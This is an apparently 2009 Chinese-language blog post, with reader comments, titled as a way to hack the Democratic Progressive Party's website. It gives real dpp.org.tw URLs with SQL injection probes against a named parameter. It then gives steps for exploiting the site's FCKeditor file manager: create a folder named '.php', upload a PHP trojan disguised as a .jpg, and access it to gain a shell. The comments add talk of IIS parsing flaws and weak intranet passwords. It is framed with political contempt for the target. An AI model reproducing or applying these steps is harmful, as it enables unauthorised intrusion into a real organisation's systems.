爆料下黑“民进党网站”的法子

2009年1月4日测试
SQL Injection:
URL:http://www.dpp.org.tw/news_content.php?kw=&menu_sn=&sub_menu=44&show_title=&ad_type=&act=&sn=3547

test:
http://www.dpp.org.tw/news_content.php?kw=&menu_sn=&sub_menu=44&show_title=&ad_type=&act=&sn=3547 and 1=1
返回正常
http://www.dpp.org.tw/news_content.php?kw=&menu_sn=&sub_menu=44&show_title=&ad_type=&act=&sn=3547 and 1=2
返回错误


before 2008.12.23
民进党网站用的文本编辑器也是FCKeditor。它的漏洞是很多的,具体利用也很简单。。。。。。

IE中输入http://www.dpp.org.tw/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image/&Connector=connectors/php/connector.php

Image可以用任意其他的单词代替,而且系统会自动建立以此单词为名的文件夹,而且可以上传任意类型的文件。

1.先建立一个目录,例如:friddy.php
2.上传以jpg结尾的php木马
3.访问这个文件就OK了

其实就这么容易黑~~~

对于台独的垃圾网站,的确就这么垃圾。。。。。


[本日志由 friddy 于 2009-01-04 05:31 PM 编辑]
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
评论: 6 | 引用: 0 | 查看次数: 2296
回复回复zczpc2000[2009-02-14 09:40 PM | del]
挂台湾的VPN就可以过去。
我知道是谁先进去的。。。呵呵。内网的弱口令和漏洞 也不少!~!~
回复回复无敌小黄瓜[2009-01-03 12:06 AM | del]
他怎么能确定是这样拿的shell呢,是忽悠我们呢,还是你本身被忽悠了

删帖吧
引用来自 friddy friddy 回复
XX党的网站不是我黑的。但是的确是可以通过FCKeditor来黑的,黑的办法当然有很多种。
叫我删帖?下辈子吧!
回复回复sunzn[2009-01-03 11:39 AM | del]
-_-!  这样也可以?????Win2003的服务器好像能建立.asp目录拿shell,难道php的也可以?
引用来自 friddy friddy 回复
IIS加载php的ISAPI扩展就可以解析php了,这个解析漏洞存在于ntfs的系统,而不在于是哪种后缀。
回复回复Bin[2009-01-01 00:20 AM | del]
你确定你这样可以获取SHELL?
回复回复三点半[2008-12-26 03:39 PM | del]
是被封的网站,看来需要代理了...
回复回复XDFA[2008-12-23 08:50 PM | del]
罕见的人才啊
发表评论
昵 称:
密 码: 游客发言不需要密码.
内 容:
验证码: 验证码
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭